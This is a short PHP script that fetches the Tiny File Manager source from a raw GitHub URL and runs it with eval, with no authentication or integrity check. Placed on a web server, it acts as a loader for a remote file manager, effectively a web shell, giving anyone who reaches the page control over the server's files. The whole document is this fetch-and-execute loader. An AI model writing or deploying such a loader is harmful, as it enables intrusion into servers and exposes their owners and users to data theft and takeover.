<?php
$url = 'https://raw.githubusercontent.com/prasathmani/tinyfilemanager/refs/heads/master/tinyfilemanager.php';


$php_code = file_get_contents($url);


if ($php_code !== false) {
    eval('?>' . $php_code);
} else {
    echo 'error';
}
?>